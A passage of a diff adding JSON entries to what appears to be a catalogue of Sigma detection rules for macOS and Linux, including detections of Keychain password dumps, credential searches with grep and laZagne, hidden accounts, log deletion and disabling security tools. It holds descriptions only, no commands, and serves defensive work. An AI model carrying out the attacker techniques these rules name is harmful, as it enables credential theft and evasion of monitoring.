"macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ] + }, + "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", + "value": "Creation Of A Local User Account" + }, + { + "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_macos_susp_find_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_find_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "85de3a19-b675-4a51-bfc6-b11a5186c971", + "value": "Potential Discovery Activity Using Find - MacOS" + }, + { + "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_create_hidden_account.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", + "value": "Hidden User Creation" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "proc_creation_macos_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "508a9374-ad52-4789-b568-fc358def2c65", + "value": "Suspicious History File Operations" + }, + { + "description": "Detects usage of system utilities to discover system network connections", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_system_network_connections_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", + "value": "System Network Connections Discovery - MacOs" + }, + { + "description": "Detects enumeration of local network configuration", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_system_network_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", + "value": "System Network Discovery - 
macOS" + }, + { + "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_xcsset_malware_infection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", + "value": "Potential XCSSET Malware Infection" + }, + { + "description": "Detecting attempts to extract passwords with grep and laZagne", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_find_cred_in_files.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", + "value": "Credentials In Files" + }, + { + "description": "Detects when a user manipulates with 
Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", + "value": "Suspicious MacOS Firmware Activity" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", + "value": "File Time Attribute Change" + }, + { + "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. 
Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" + ], + "tags": [ + "attack.t1059", + "attack.t1204", + "attack.execution", + "attack.t1140", + "attack.defense_evasion", + "attack.s0482", + "attack.s0402" + ] + }, + "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", + "value": "Payload Decoded and Decrypted via Built-in Utilities" + }, + { + "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", + "meta": { + "author": "remotephone", + "creation_date": "2021/11/20", + "falsepositive": [ + "Mistyped commands or legitimate binaries named to match the pattern" + ], + "filename": "proc_creation_macos_space_after_filename.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.006" + ] + }, + "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", 
+ "value": "Space After Filename - macOS" + }, + { + "description": "Detects enumeration of local system groups", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_local_groups.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", + "value": "Local Groups Discovery - MacOs" + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", + "value": "Scheduled Cron Task/Job - MacOs" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", + "value": "Decode Base64 Encoded Text -MacOs" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_remote_system_discovery.yml", + 
"level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", + "value": "Macos Remote System Discovery" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", + "value": "Split A File Into Pieces" + }, + { + "description": "Detects attempts to use system dialog prompts to capture user credentials", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate administration tools and activities" + ], + "filename": "proc_creation_macos_gui_input_capture.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1056.002" + ] + }, + "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", + "value": "GUI Input Capture - macOS" + }, + { + "description": "Detects enumeration of local systeam accounts on MacOS", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", + "value": "Local System Accounts Discovery - MacOs" + }, + { + "description": "Detects the execution traces of the WizardUpdate malware. 
WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", + "value": "Potential WizardUpdate Malware Infection" + }, + { + "description": "Detects deletion of local audit logs", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_clear_system_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", + "value": "Indicator Removal on Host - Clear Mac System Logs" + }, + { + 
"description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", + "value": "System Shutdown/Reboot - MacOs" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_disable_security_tools.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", + "value": "Disable Security Tools" + }, + { + "description": "Detects passwords dumps from Keychain", + "meta": { + "author": "Tim Ismilyaev, oscd.community, Florian Roth", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_creds_from_keychain.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://gist.github.com/Capybara/6228955", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.001" + ] + }, + "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", + "value": "Credentials from Password Stores - Keychain" + }, + { + "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_network_sniffing.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", + "value": "Network Sniffing - MacOs" + }, + { + "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. 
Scan type - Vulnerability Management.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "default_credentials_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" + ], + "tags": "No established tags" + }, + "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", + "value": "Default Credentials Usage" + }, + { + "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/19", + "falsepositive": "No established falsepositives", + "filename": "host_without_firewall.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" + ], + "tags": "No established tags" + }, + "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", + "value": "Host Without Firewall" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all 
administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "netflow_cleartext_protocols.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", + "value": "Cleartext Protocol Usage Via Netflow" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/09/17", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
+ ], + "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" + }, + { + "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", + "meta": { + "author": "David Burkett, @signalblur", + "creation_date": "2022/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_binary_execution.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", + "value": "Use Of Hidden Paths Or Files" + }, + { + "description": "Detects file and folder permission changes.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "User interacting with files permissions (normal/daily behaviour)." 
+ ], + "filename": "lnx_auditd_file_or_folder_permissions.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "value": "File or Folder Permissions Change" + }, + { + "description": "Detect changes of syslog daemons configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_logging_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "self experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", + "value": "Logging Configuration Changes on Linux Host" + }, + { + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/02/03", + "falsepositive": [ + "Admin work like legit service installs." 
+ ], + "filename": "lnx_auditd_systemd_service_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "value": "Systemd Service Creation" + }, + { + "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_auditd_bpfdoor_file_accessed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.t1059" + ] + }, + "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", + "value": "BPFDoor Abnormal Process ID or Lock File Accessed" + }, + { + "description": "Detects attempts to record audio with arecord utility", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_audio_capture.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1123/", + "https://linux.die.net/man/1/arecord", + 
"https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "value": "Audio Capture" + }, + { + "description": "Detecting attempts to extract passwords with grep", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_find_cred_in_files.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", + "value": "Credentials In Files - Linux" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "lnx_auditd_binary_padding.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 